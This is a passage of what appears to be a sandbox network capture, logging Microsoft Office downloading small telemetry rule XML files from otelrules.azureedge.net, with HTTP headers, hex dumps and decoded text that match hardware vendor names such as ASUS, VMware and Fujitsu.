                                          2024-11-18 22:44:48 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:48 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:48 GMT
                                          Content-Type: text/xml
                                          Content-Length: 407
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                          ETag: "0x8DC582BBAD04B7B"
                                          x-ms-request-id: 5d8d4d17-101e-007a-18d2-37047e000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224448Z-16547b76f7fgvq8chC1DFWhd2w00000006w0000000012d96
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:48 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          37192.168.2.45731413.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:48 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:48 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:48 GMT
                                          Content-Type: text/xml
                                          Content-Length: 486
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                          ETag: "0x8DC582BB344914B"
                                          x-ms-request-id: ccb6a3a7-001e-0017-1ab5-370c3c000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224448Z-16547b76f7fhv4d5hC1DFW7h0n00000004w0000000004nqq
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:48 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          38192.168.2.45731613.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:48 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:48 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:48 GMT
                                          Content-Type: text/xml
                                          Content-Length: 486
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                          ETag: "0x8DC582B9018290B"
                                          x-ms-request-id: 7d8b8a82-001e-0066-1ad2-37561e000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224448Z-16547b76f7f5b5tthC1DFWuk84000000050g00000000n8zq
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:48 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          39192.168.2.45731513.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:48 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:48 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:48 GMT
                                          Content-Type: text/xml
                                          Content-Length: 427
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                          ETag: "0x8DC582BA310DA18"
                                          x-ms-request-id: a27d7b4e-f01e-0003-126b-374453000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224448Z-164f84587bfs5tz9hC1DFW9a3w00000006h000000000fy10
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:48 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          40192.168.2.45731713.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:48 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:48 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:48 GMT
                                          Content-Type: text/xml
                                          Content-Length: 407
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                          ETag: "0x8DC582B9698189B"
                                          x-ms-request-id: 83d1d4f5-101e-0065-62ca-394088000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224448Z-r18f44ddb699qlj8hC1DFWad8c00000000g000000000cqt6
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:48 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          41192.168.2.45731813.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:49 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:49 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:49 GMT
                                          Content-Type: text/xml
                                          Content-Length: 469
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                          ETag: "0x8DC582BBA701121"
                                          x-ms-request-id: 09c62b6e-c01e-002b-7879-376e00000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224449Z-164f84587bfmxxfphC1DFW3au800000004xg00000000cdvd
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:49 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          42192.168.2.45732013.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:49 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:49 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:49 GMT
                                          Content-Type: text/xml
                                          Content-Length: 477
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                          ETag: "0x8DC582BB8CEAC16"
                                          x-ms-request-id: 9a5983e6-f01e-001f-229b-365dc8000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224449Z-164f84587bffvwt9hC1DFW2ktw000000045g00000000kqr1
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:49 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          43192.168.2.45731913.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:49 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:49 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:49 GMT
                                          Content-Type: text/xml
                                          Content-Length: 415
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                          ETag: "0x8DC582BA41997E3"
                                          x-ms-request-id: a4488d51-301e-0096-053f-38e71d000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224449Z-17cf5b775c4dj7lnhC1DFWmqrg00000000cg00000000302u
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          X-Cache-Info: L1_T2
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:49 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          44192.168.2.45732113.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:49 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:49 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:49 GMT
                                          Content-Type: text/xml
                                          Content-Length: 464
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                          ETag: "0x8DC582B97FB6C3C"
                                          x-ms-request-id: b768cb33-701e-005c-69ef-39bb94000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224449Z-1866b5c5fbbb9dv9hC1DFWps5c00000001p0000000003wpn
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:49 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          45192.168.2.45732213.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:49 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:49 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:49 GMT
                                          Content-Type: text/xml
                                          Content-Length: 494
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                          ETag: "0x8DC582BB7010D66"
                                          x-ms-request-id: c32296f1-601e-003d-7597-376f25000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224449Z-164f84587bfsgfx9hC1DFWw1as00000006ag00000000hgw6
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:49 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          46192.168.2.45732313.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:50 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:50 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:50 GMT
                                          Content-Type: text/xml
                                          Content-Length: 419
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                          ETag: "0x8DC582B9748630E"
                                          x-ms-request-id: 3ed4fa9a-c01e-000b-399a-37e255000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224450Z-16547b76f7fw2955hC1DFWsptc00000006x000000000k4v9
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:50 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          47192.168.2.45732413.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:50 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:50 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:50 GMT
                                          Content-Type: text/xml
                                          Content-Length: 472
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                          ETag: "0x8DC582B9DACDF62"
                                          x-ms-request-id: 849cffad-401e-008c-4c40-3686c2000000
                                          x-ms-version: 2018-03-28
